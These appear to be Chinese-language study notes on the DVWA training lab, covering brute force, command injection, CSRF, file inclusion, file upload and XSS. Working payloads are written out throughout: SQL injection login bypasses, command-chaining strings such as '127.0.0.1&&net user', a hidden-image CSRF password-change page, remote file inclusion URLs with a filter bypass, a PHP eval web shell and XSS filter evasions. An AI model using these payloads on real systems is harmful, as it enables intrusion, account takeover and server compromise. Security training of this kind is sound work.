Brute Force
- Low
- 利用burpsuite即可完成(复制粘贴会出现400 bad request错误)
抓包,按ctrl+i或action下的send to intruder 设置参数 设置字典 开始破解
2.手工sql注入
1. Username:admin' or'1'='1 Password:(空)
2. Username :admin'# Password :(空)
SELECT * FROM `users` WHERE user='$user' AND password='$pass';
- High
python脚本
Command Injection(命令行注入)
- Low
- 127.0.0.1&&net user window和linux系统都可以用&&来执行多条命令
- Medium
- 127.0.0.1&net user 用一个&代替&& &:第一个成功在执行第二个
- 127.0.0.1&;&ipconfig
- High
- 127.0.0.1|net user
CSRF(跨站请求伪造)
- Low
- http://192.168.153.130/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change# 点击发送http请求就修改密码 CSRF最关键就是利用受害者的cookie向服务器发送伪造请求,如果之前用谷歌登录,后在火狐打开有害链接,不会修改密码,会跳到登录界面。
<img src="http://192.168.153.130/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#" border="0" style="display:none;"/> <h1>404<h1> <h2>file not found.<h2>
File Inclusion(文件包含)
- Low
- 本地文件包含 http://192.168.140.132/dvwa/vulnerabilities/fi/?page=/1.txt 打开了服务器本地的根目录下的一个文件夹
- 远程文件包含http://192.168.140.132/dvwa/vulnerabilities/fi/?page=http://192.168.140.1:8081/Webhello/1.txt 打开远程服务器下的一个文件 调用里面的函数
- Medium
- http://192.168.153.130/dvwa/vulnerabilities/fi/page=htthttp://p://192.168.140.1:8081/Webhello/1.txt medium会删除"http://" 因此此路径删除后还有一个http://
- High
File Upload(文件上传)
- 上传一句话木马: <?php @eval($_POST['apple']); ?>
- 使用中国菜刀发送post请求
Insecure CAPTCHA(不安全的验证码)
SQL Injection(SQL注入)
SQL Injection(Blind)(SQL盲注)
XSS(Reflected)(反射型跨站脚本)
- Low
- <script>alert(/xss/)</script>
- Medium
- <sc<script>ript>alert(/xss/)</script>
- <ScRipt>alert(/xss/)</script>
- High
通过img、body等标签的事件或者iframe等标签的src注入恶意的js代码
<img src=1 οnerrοr=alert(/xss/)>